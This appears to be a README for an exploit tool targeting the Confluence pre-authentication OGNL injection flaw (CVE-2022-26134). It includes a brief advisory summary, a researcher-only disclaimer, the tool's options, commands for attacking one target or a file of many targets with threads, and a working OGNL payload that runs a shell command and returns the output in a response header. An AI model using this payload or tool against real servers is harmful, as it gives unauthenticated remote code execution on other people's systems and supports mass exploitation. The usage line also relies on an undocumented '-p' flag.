Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)

Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)

• On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.

IMPORTANT

This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I didn't recommend of illegal actions and take no responsibility for any malicious use of this script.

• Request Example

Exploit Usage

python3 exploit.py -h
Usage: exploit.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     Base target uri (ex. http://target-uri/)
  -f FILEHOSTS, --file=FILEHOSTS
                        example.txt
  -t THREADS_SET, --threads=THREADS_SET
  -m TIMEOUT, --maxtimeout=TIMEOUT
  -o OUTPUT, --output=OUTPUT
  -c COMMAND, --cmd=COMMAND

Exploit single target:

$ python3 exploit.py -u http://xxxxx.com -c id

Exploit multitargets

$ python3 exploit.py -f urls.txt -p -c id

OGNL expression

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

References:

• https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

• https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis